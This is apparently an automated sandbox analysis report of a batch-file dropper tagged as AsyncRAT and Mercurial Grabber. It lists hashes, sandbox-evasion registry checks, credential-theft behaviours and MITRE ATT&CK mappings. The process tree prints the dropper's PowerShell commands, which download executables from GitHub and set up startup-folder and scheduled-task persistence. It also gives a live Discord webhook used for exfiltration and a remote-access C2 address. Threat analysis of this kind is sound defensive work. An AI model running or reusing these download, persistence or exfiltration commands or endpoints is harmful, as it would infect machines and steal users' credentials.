asyncrat | 412476007cd57ca529c83c386125249fbe0952a2522f5d838ffd3fb10a6e1f74

General

Target

fab.bat
Size

1KB
MD5

f3f83ae17a3f81e0265b9ce7e480bd4e
SHA1

994d8d5b533fd09630b45a0d0404f65557e83d5d
SHA256

412476007cd57ca529c83c386125249fbe0952a2522f5d838ffd3fb10a6e1f74
SHA512

cc0480e5cf4b8d6ca9318f806587bf121dc8feb553263e4756b43b568cf38d93ce94a467e87878f299d3fdabc66e178c8dafa96e3e5fda51bbfd7a6b4220bf39

Score

10^/10

asyncrat mercurialgrabber default evasion execution rat spyware stealer

Malware Config

Extracted

Family

mercurialgrabber

C2

https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0

Extracted

Family

asyncrat

Botnet

Default

C2

technical-southwest.gl.at.ply.gg:58694

Attributes

delay
1
install
true
install_file
WINDOWS.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
stealer mercurialgrabber
Mercurialgrabber family
mercurialgrabber

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Loader.exe	family_asyncrat

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

output.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions output.exe
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

7 2428 powershell.exe
9 2428 powershell.exe
25 1268 powershell.exe
26 1268 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2428 powershell.exe
1268 powershell.exe
3736 powershell.exe
3580 powershell.exe
Downloads MZ/PE file
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

output.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools output.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

output.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion output.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Loader.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation Loader.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	output.exe

flow	pid	process
7	2428	powershell.exe
9	2428	powershell.exe
25	1268	powershell.exe
26	1268	powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools	output.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	output.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	Loader.exe

Drops startup file 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk	powershell.exe

Executes dropped EXE 3 IoCs

Processes:

output.exeLoader.exeWINDOWS.exe

pid process

3852 output.exe
4224 Loader.exe
2632 WINDOWS.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 ip4.seeip.org
39 ip-api.com

pid	process
3852	output.exe
4224	Loader.exe
2632	WINDOWS.exe

flow	ioc
23	ip4.seeip.org
39	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

output.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	output.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	output.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

output.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S output.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	output.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

output.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	output.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3124 timeout.exe

pid	process
3124	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

output.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	output.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3888 schtasks.exe

pid	process
3888	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeLoader.exeWINDOWS.exe

pid	process
2428	powershell.exe
2428	powershell.exe
3736	powershell.exe
3736	powershell.exe
1268	powershell.exe
1268	powershell.exe
3580	powershell.exe
3580	powershell.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
4224	Loader.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe
2632	WINDOWS.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exeoutput.exepowershell.exeLoader.exeWINDOWS.exe

description	pid	process
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	3852	output.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	4224	Loader.exe
Token: SeDebugPrivilege	4224	Loader.exe
Token: SeDebugPrivilege	2632	WINDOWS.exe
Token: SeDebugPrivilege	2632	WINDOWS.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

cmd.exeLoader.execmd.execmd.exe

description	pid	process	target process
PID 1248 wrote to memory of 2428	1248	cmd.exe	powershell.exe
PID 1248 wrote to memory of 2428	1248	cmd.exe	powershell.exe
PID 1248 wrote to memory of 3736	1248	cmd.exe	powershell.exe
PID 1248 wrote to memory of 3736	1248	cmd.exe	powershell.exe
PID 1248 wrote to memory of 3852	1248	cmd.exe	output.exe
PID 1248 wrote to memory of 3852	1248	cmd.exe	output.exe
PID 1248 wrote to memory of 1268	1248	cmd.exe	powershell.exe
PID 1248 wrote to memory of 1268	1248	cmd.exe	powershell.exe
PID 1248 wrote to memory of 3580	1248	cmd.exe	powershell.exe
PID 1248 wrote to memory of 3580	1248	cmd.exe	powershell.exe
PID 1248 wrote to memory of 4224	1248	cmd.exe	Loader.exe
PID 1248 wrote to memory of 4224	1248	cmd.exe	Loader.exe
PID 4224 wrote to memory of 2028	4224	Loader.exe	cmd.exe
PID 4224 wrote to memory of 2028	4224	Loader.exe	cmd.exe
PID 4224 wrote to memory of 2668	4224	Loader.exe	cmd.exe
PID 4224 wrote to memory of 2668	4224	Loader.exe	cmd.exe
PID 2668 wrote to memory of 3124	2668	cmd.exe	timeout.exe
PID 2668 wrote to memory of 3124	2668	cmd.exe	timeout.exe
PID 2028 wrote to memory of 3888	2028	cmd.exe	schtasks.exe
PID 2028 wrote to memory of 3888	2028	cmd.exe	schtasks.exe
PID 2668 wrote to memory of 2632	2668	cmd.exe	WINDOWS.exe
PID 2668 wrote to memory of 2632	2668	cmd.exe	WINDOWS.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fab.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/DD/releases/download/D/output.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2428
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3736
- C:\Users\Admin\Desktop\output.exe
  C:\Users\Admin\Desktop\output.exe
  2⤵
  - Looks for VirtualBox Guest Additions in registry
  - Looks for VMWare Tools registry key
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Maps connected drives based on registry
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of AdjustPrivilegeToken
  PID:3852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3580
- C:\Users\Admin\Desktop\Loader.exe
  C:\Users\Admin\Desktop\Loader.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4224
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2028
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD551.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2668
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3124
  - - C:\Users\Admin\AppData\Roaming\WINDOWS.exe
      "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Virtualization/Sandbox Evasion

2

T1497

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

7

T1082

Virtualization/Sandbox Evasion

2

T1497

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ed30ca9187bf5593affb3dc9276309a6

SHA1
c63757897a6c43a44102b221fe8dc36355e99359

SHA256
81fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122

SHA512
1df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f642e9a9ec48b7ade765089e6dc7fe2c

SHA1
915743eb8eadec32d80d79d55e80623017240840

SHA256
1e73b77ed880bbd281a209ac99697fbf32bed556c606d522ff4acc1ef9764d91

SHA512
187d166cb311214db2ad2c2198854bcff979c307e251f4e0aa067a5c56b55f3ee15ca5e941708749cdf0844a4230be4ccdb3d0dccbd3bea9abfd7547b5b7b9d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec5b38161c8f6ac340cb6138cb596b43

SHA1
f7bff6bbace0c89c34c1c5d691278555ad0dde92

SHA256
9408e79b4c066356b3446a3466d773704ed1bf7e247672063c992fe9c2710074

SHA512
96adb62f8b43821ff908637e0f180c371634c5368f82206af4775c7fbbce7b9cd22d40da99593012e01b853df5461d10cc93998c1382f574e47692ca4a254e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7a7c4e11f39892e8fe79d116dd8483bd

SHA1
2032542fab0c4484caea72365ce1cf41bb84cdad

SHA256
a4780dce56ff0e2c3a5a885dfa4326715d587c048425fafab9ef4cc0a960f354

SHA512
399fe579df9178f146322ccca998fab9bac957a9520feb452b0c2d22b4534cf4b4f0db42d33db566dd587375f7d26fdb7620891e5bfb4e82865d7e805f1672a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1q1h54x2.35r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD551.tmp.bat

Filesize
151B

MD5
dac80343dc5bb7484373304dbe0e189e

SHA1
517d701715c57837fc2f4c44ef4334415345725d

SHA256
0de5aa3c30f23f99569f38273b73a7c8c8f21687cdbbfb8fb8c765aef07694ed

SHA512
73dd0492d367368ce6420c494c6656964956abf0b2fd90c555b6400f6a75b5639132bd57c1676da1cb08965de70990537bf9dd82b7d179e2d5f8cc43154981ab

Download Submit
C:\Users\Admin\Desktop\Loader.exe

Filesize
63KB

MD5
7ceb11ebb7a55e33a82bc3b66f554e79

SHA1
8dfd574ad06ded662d92d81b72f14c1914ac45b5

SHA256
aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

SHA512
d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

Download Submit
C:\Users\Admin\Desktop\output.exe

Filesize
41KB

MD5
a0e598ec98a975405420be1aadaa3c2a

SHA1
d861788839cfb78b5203686334c1104165ea0937

SHA256
e6ac8a6dac77f9873024f50befb293b9cf6347aa2e093cd863b551d9c8da5f8d

SHA512
e5ee500a8dcddd72e727cfa24e51093cd2b088f7ef89089f1d24145baa41c1ac46bf6be73bfd8cb15e2549349da8c2547d4e391b6e3a456621524fe0f83f9585

Download Submit
memory/2428-11-0x00007FFD27080000-0x00007FFD27B42000-memory.dmp

Filesize
10.8MB

Download
memory/2428-17-0x00007FFD27080000-0x00007FFD27B42000-memory.dmp

Filesize
10.8MB

Download
memory/2428-0-0x00007FFD27083000-0x00007FFD27085000-memory.dmp

Filesize
8KB

Download
memory/2428-13-0x00007FFD27080000-0x00007FFD27B42000-memory.dmp

Filesize
10.8MB

Download
memory/2428-12-0x00007FFD27080000-0x00007FFD27B42000-memory.dmp

Filesize
10.8MB

Download
memory/2428-1-0x000001F7DB550000-0x000001F7DB572000-memory.dmp

Filesize
136KB

Download
memory/3736-30-0x00007FFD27080000-0x00007FFD27B42000-memory.dmp

Filesize
10.8MB

Download
memory/3736-36-0x00007FFD27080000-0x00007FFD27B42000-memory.dmp

Filesize
10.8MB

Download
memory/3736-32-0x00007FFD27080000-0x00007FFD27B42000-memory.dmp

Filesize
10.8MB

Download
memory/3736-29-0x00007FFD27080000-0x00007FFD27B42000-memory.dmp

Filesize
10.8MB

Download
memory/3736-19-0x00007FFD27080000-0x00007FFD27B42000-memory.dmp

Filesize
10.8MB

Download
memory/3852-38-0x0000000000720000-0x0000000000730000-memory.dmp

Filesize
64KB

Download
memory/4224-65-0x00000000002E0000-0x00000000002F6000-memory.dmp

Filesize
88KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads